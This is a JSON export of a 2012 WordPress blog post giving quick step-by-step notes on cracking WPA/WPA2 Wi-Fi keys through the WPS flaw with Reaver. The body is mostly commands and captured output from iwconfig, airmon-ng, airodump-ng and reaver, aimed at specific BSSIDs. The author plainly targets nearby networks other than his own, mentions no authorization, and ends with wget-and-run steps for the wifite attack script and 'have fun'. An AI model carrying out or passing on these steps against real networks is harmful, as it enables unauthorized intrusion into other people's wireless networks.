{"id":900,"date":"2012-10-20T14:53:52","date_gmt":"2012-10-20T06:53:52","guid":{"rendered":"http:\/\/www.computersolutions.cn\/blog\/?p=900"},"modified":"2012-10-20T18:16:18","modified_gmt":"2012-10-20T10:16:18","slug":"quick-notes-on-reaver-wpa-attack","status":"publish","type":"post","link":"https:\/\/www.computersolutions.cn\/blog\/2012\/10\/quick-notes-on-reaver-wpa-attack\/","title":{"rendered":"Quick notes on Reaver (WPA attack)"},"content":{"rendered":"<p>Assuming all the tools are installed (<a href=\"http:\/\/code.google.com\/p\/reaver-wps\/\">http:\/\/code.google.com\/p\/reaver-wps\/<\/a>)<\/p>\n<p>Reaver is an attack on WPA\/WPA2 using a vulnerability in the WPS mechanism.<\/p>\n<p>First up, we need to find out what our network cards are called, so use iwconfig to list wifi \/ network  interfaces<\/p>\n<p>eg<\/p>\n<p>iwconfig<\/p>\n<p><code>iwconfig<br \/>\nlo        no wireless extensions.<\/p>\n<p>wlan1     IEEE 802.11bgn  Mode:Monitor  Tx-Power=20 dBm<br \/>\n          Retry  long limit:7   RTS thr:off   Fragment thr:off<br \/>\n          Power Management:on<\/p>\n<p>eth0      no wireless extensions.<\/p>\n<p>wlan3     IEEE 802.11bg  Mode:Monitor  Tx-Power=20 dBm<br \/>\n          Retry  long limit:7   RTS thr:off   Fragment thr:off<br \/>\n          Power Management:on<br \/>\n<\/code><\/p>\n<p>In the above, we have wlan1 and wlan3 as possible interfaces.<\/p>\n<p>Next up, we put the wifi card into monitor mode (pick a card)<br \/>\nHere I&#8217;m using wlan1<\/p>\n<p>airmon-ng start <wifi interface><\/p>\n<p><code>airmon-ng start wlan1<\/p>\n<p>Found 2 processes that could cause trouble.<br \/>\nIf airodump-ng, aireplay-ng or airtun-ng stops working after<br \/>\na short period of time, you may want to kill (some of) them!<\/p>\n<p>PID\tName<br \/>\n1791\tavahi-daemon<br \/>\n1792\tavahi-daemon<\/p>\n<p>Interface\tChipset\t\tDriver<\/p>\n<p>wlan1\t\tUnknown \trt2800usb - [phy0]<br \/>\n\t\t\t\t(monitor mode enabled on mon0)<br \/>\nwlan3\t\tRTL8187 \trtl8187 - [phy3]<br \/>\n<\/code><\/p>\n<p>That creates another interface (mon0 above), that we can connect to.<br \/>\nNext, we need to list the various wifi lans in the vicinity<\/p>\n<p>We can use the new interface to do so (or use any existing wifi interface, doesn&#8217;t really matter)<\/p>\n<p><code><br \/>\nairodump-ng mon0<\/p>\n<p>CH 13 ][ Elapsed: 20 s ][ 2012-10-20 08:39                                         <\/p>\n<p> BSSID              PWR  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID                                    <\/p>\n<p> EC:17:2F:F3:0F:A8  -35       21      241    0   7  54e  WPA2 CCMP   PSK  First_Network<br \/>\n 00:18:39:28:3B:2C  -72        9        0    0   5  54 . WPA2 CCMP   PSK  Second_Network<br \/>\n 00:25:BC:8D:4F:F5  -75        5        4    0  11  54e. WPA2 CCMP   PSK  Third_Network                           <\/p>\n<p> BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                          <\/p>\n<p> EC:17:2F:F3:0F:A8  74:E2:F5:4D:C5:11   -1    0e- 0      0        2<br \/>\n EC:17:2F:F3:0F:A8  00:04:20:16:5E:52  -52   48 -54      0       14<br \/>\n EC:17:2F:F3:0F:A8  70:56:81:C2:1B:3B  -66    0e- 1e     0        6<br \/>\n EC:17:2F:F3:0F:A8  00:23:4E:7E:FC:B4  -74    0e- 1      0        3<br \/>\n EC:17:2F:F3:0F:A8  00:08:65:30:93:D3  -76   36 -12e     0      217<br \/>\n<\/code><\/p>\n<p>Here you can see that the interface see&#8217;s 3 separate networks.<br \/>\nIt can also identify that First_Network has connections from a number of computers<\/p>\n<p>Ideally, we want to sniff the network with the most traffic, in this case, thats my existing network, so we&#8217;ll skip it.<\/p>\n<p>We can see that Second_Network is on Channel 5, and Third_Network is on channel 11<\/p>\n<p>Now we have enough information to try to discover the key for the other networks.<\/p>\n<p>Startup reaver, and connect to a BSSID above<\/p>\n<p>reaver -i mon0  -b BSSID -a -vv -c CHANNEL<\/p>\n<p>BSSID&#8217;s &#8211;<br \/>\n00:18:39:28:3B:2C &#8211; Second_Network Channel 5<br \/>\n00:25:BC:8D:4F:F5 &#8211; Third_Network  Channel 11<\/p>\n<p>eg<\/p>\n<p><code><br \/>\nreaver -i mon0 -b 00:25:BC:8D:4F:F5 -vv -a -c11<\/p>\n<p>Reaver v1.4 WiFi Protected Setup Attack Tool<br \/>\nCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com><\/p>\n<p>[+] Switching mon0 to channel 11<br \/>\n[+] Waiting for beacon from 00:25:BC:8D:4F:F5<br \/>\n<\/code><\/p>\n<p>This should connect to the network, and start to do its magic.<\/p>\n<p>If you get issues like<\/p>\n<p>[!] WARNING: Failed to associate with 00:25:BC:8D:4F:F5 (ESSID: Third_Network)<\/p>\n<p>Then you need to try another with another wifi card chipset, as your drivers don&#8217;t support monitor mode correctly.<\/p>\n<p>If it does connect, then you&#8217;re set.  Let it run, and a few hours later, you should see the wifi name and password.<\/p>\n<p>A much easier way to do all this, is of course to use the prepackaged scripts at <\/p>\n<p><a href=\"http:\/\/code.google.com\/p\/wifite\/\">http:\/\/code.google.com\/p\/wifite\/<\/a><\/p>\n<p>wget -O wifite.py http:\/\/wifite.googlecode.com\/svn\/trunk\/wifite.py<\/p>\n<p>chmod +x wifite.py<\/p>\n<p>.\/wifite.py<\/p>\n<p>Then have fun..<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Assuming all the tools are installed (http:\/\/code.google.com\/p\/reaver-wps\/) Reaver is an attack on WPA\/WPA2 using a vulnerability in the WPS mechanism. First up, we need to find out what our network cards are called, so use iwconfig to list wifi \/ network interfaces eg iwconfig iwconfig lo no wireless extensions. wlan1 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[48,25,4],"tags":[118,427,331],"class_list":["post-900","post","type-post","status-publish","format-standard","hentry","category-exploits","category-technical-mumbo-jumbo","category-useful-info","tag-howto","tag-reaver","tag-wifi"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/comments?post=900"}],"version-history":[{"count":4,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900\/revisions"}],"predecessor-version":[{"id":903,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/posts\/900\/revisions\/903"}],"wp:attachment":[{"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/media?parent=900"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/categories?post=900"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.computersolutions.cn\/blog\/wp-json\/wp\/v2\/tags?post=900"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}